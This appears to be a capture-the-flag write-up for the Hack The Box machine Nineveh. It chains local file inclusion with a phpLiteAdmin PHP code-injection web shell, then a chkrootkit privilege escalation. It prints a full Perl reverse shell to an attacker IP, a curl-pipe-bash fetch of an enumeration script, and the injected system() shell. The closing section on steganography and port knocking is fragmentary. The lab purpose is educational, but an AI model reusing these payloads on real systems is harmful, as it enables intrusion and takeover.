Vulnerability Explanation: The machine is vulnerable to LFI on port 80 and set up with weak password policy. On port 443, it is vulnerable to Code Execute via phpLiteAdmin. It chain from LFI to execute our reverse shell and allow us to gain initial shell on the machine.
Privilege Escalation Vulnerability: Chkrootkit version out of dated
Vulnerability Fix: All users must set with strong password, validated the user input and apply patch to the system.
Severity: Critical
Step to Compromise the Host:
Reconnaissance
└─$ nmap -sC -sV -T4 -p- 10.10.10.43
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-04 04:17 EDT
Nmap scan report for 10.10.10.43
Host is up (0.048s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
Enumeration
Port 80 Apache/2.4.18
By going through webpage on port 80, but nothing is there even source code.
By nmap script, we found hostname nineveh.htb. Let add to /etc/hosts.
Following through the hostname, we still got the same page.
Let run gobuster to find if there is any directory hidden. We found one directory /department.
Going through with /department directory, it leads us to the login page. First thing come to mind when I see login page, I will try with default credential and SQL injection but doesn't work.
By viewing the source code, we can assume those are username admin and amrois. On the login webpage could allow us to enumerate the username.
Once we enter username admin and random password, the error message display "Invalid Password" and if we enter username amrois, it displays "Invalid Username". We can confirms that username is admin.
Let start intercept proxy on burp to check how many parameters are require once we hit login.
Brute Force web
Let perform hydra to brute login with username admin.
We can log into phpLiteAdmin now. phpLiteAdmin is a PHP tool to interact with SQLite Databases and it's similar to phpMyadmin databases.
SQLite is a kind of plain text database system, we can insert php code in a table and rename that database to .php we can execute it.
Then, going to /secure-notes, it just displays an image seem like it's something we need to check.
Exploitation
Port 80 (LFI)
On the URL, we have seen the parameter file path and the thing we need to test is LFI.
# Request
http://10.10.10.43/department/manage.php?notes=files/ninevehNotes.txt
# Response
. Have you fixed the login page yet! hardcoded username and password is really bad idea!
. check your serect folder to get in! figure it out! this is your challenge
. Improve the db interface.
~amrois
# Request
http://10.10.10.43/department/manage.php?notes=files/../../../etc/passwd
http://10.10.10.43/department/manage.php?notes=../../../etc/passwd
http://10.10.10.43/department/manage.php?notes=ninevehNotes../../../etc/passwd
# Response
No Note is selected.
include(): is the php function and if we get any PHP code there, it doesn't matter what extension is, it's going to execute that file with PHP.
# Request
http://10.10.10.43/department/manage.php?notes=files/ninevehNotes
http://10.10.10.43/department/manage.php?notes=files/ninevehNotes/../../etc/passwd
http://10.10.10.43/department/manage.php?notes=/ninevehNotes/../../etc/passwd
# Response
Warning: include(files/ninevehNotes): failed to open stream: No such file or directory in /var/www/html/department/manage.php on line 31
Warning: include(): Failed opening 'files/ninevehNotes' for inclusion (include_path='.:/usr/share/php') in /var/www/html/department/manage.php on line 31
From the above result, if we don't include the /ninevehNotes, it will return "no Note is selected".
Now it's working. Normally for LFI vulnerable, it usually needs another vulnerability in order to get remote code execution.
Port 443 (Code Execution)
By searching for public exploit on phpLiteAdmin, it is vulnerable to PHP remote code injection.
# phpLiteAdmin 1.9.3 - Remote PHP Code Injection
Description:
phpliteadmin.php#1784: 'Creating a New Database' =>
phpliteadmin.php#1785: 'When you create a new database, the name you entered will be appended with the appropriate file extension (.db, .db3, .sqlite, etc.) if you do not include it yourself. The database will be created in the directory you specified as the $directory variable.',
An Attacker can create a sqlite Database with a php extension and insert PHP Code as text fields. When done the Attacker can execute it simply by access the database file with the Webbrowser.
PHPLiteAdmin RCE
First create a new table with name: testing and number of fields: 1.
Let inject the php code into the field and change type to text and hit create.
<?php system($_REQUEST['cmd']); ?>
We can go change the database name with .php extension and we can see the path to execute.
Let get back to our LFI and get execute the file path. As we got the error message.
# Request
http://10.10.10.43/department/manage.php?notes=/ninevehNotes/../../../var/tmp/code.php&cmd=ls
#Resonse
Parse error: syntax error, unexpected 'cmd' (T_STRING), expecting ']' in /var/tmp/code.php on line 2
Let change execute to <?php system($_REQUEST["cmd"]); ?> and now it executed.
By now let send this request to burp and start our netcat listener on port 4444.
nc -lvp 4444
Let grab revershell from pentest monkey.
# Before Encode
cmd=perl -e 'use Socket;$i="10.10.14.31";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
# Request for reverse shell
GET /department/manage.php?notes=/ninevehNotes/../../../var/tmp/code.php&cmd=perl+-e+'use+Socket%3b$i%3d"10.10.14.31"%3b$p%3d4444%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/bash+-i")%3b}%3b' HTTP/1.1
Privilege Escalation
Let start transfer file lineum.sh for enumerating on the victim machine.
python3 -m http.server 80
From our victim machine, we can grab and execute the file.
curl 10.10.14.31/lineum.sh | bash
As we can see port 22 open on the machine but our nmap result doesn't detect that.
Let start transfer fie pspy32 to our machine to enumerate the process running on machine.
wget 10.10.14.13/pspy32
chmod +x pspy32
./pspy32
chkrootkit (Priv-Esc)
We notice every second or minute, file chrootkit always run.
Otherwise can run the script from Ippsec video,
#!/bin/bash
#loop by line
IFS=$'\n'
old_process=$(ps -eo command)
while true; do
new_process=$(ps -eo command)
diff <(echo "$old_process") <(echo "$new_process")
sleep 1
old_process=$new_process
done
By searching on public exploit, we found it's vulnerable to local privilege escalation.
Steps to reproduce:
- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)
Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.
If an attacker knows you are periodically running chkrootkit (like in
cron.daily) and has write access to /tmp (not mounted noexec), he may
easily take advantage of this.
Suggested fix: Put quotation marks around the assignment.
Go to /tmp folder and create file update with bash scripting reverse shell.
Let start our netcat listener on port 5555 and wait about 1minute our shell pop up as root user.
Extra Content
Steganography (Image)
Remember, we found an image on /secure-notes. Let download the image file and check on that. Checking the file type of that image just simple PNG image.
└─$ for i in 571 290 911; do nmap -Pn --max-retries 0 -p $i 10.10.10.43 && sleep 1; done
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-05 07:34 EDT
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.
PORT STATE SERVICE
571/tcp filtered umeter
Nmap done: 1 IP address (1 host up) scanned in 1.13 seconds
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-05 07:34 EDT
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.
PORT STATE SERVICE
290/tcp filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 1.12 seconds
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-05 07:34 EDT
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.
PORT STATE SERVICE
911/tcp filtered xact-backup
Nmap done: 1 IP address (1 host up) scanned in 1.12 seconds
Let check on port 22 again, we found it opened now.
└─$ nmap -p22 10.10.10.43
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-05 07:34 EDT
Nmap scan report for 10.10.10.43
Host is up (0.043s latency).
PORT STATE SERVICE
22/tcp open ssh
Now we can SSH to the server with username amrois.
function in php use for comparing 2 strings.
other method, we are using for searching binary images for embedded files and executable code. We can see hidden tar archive file.
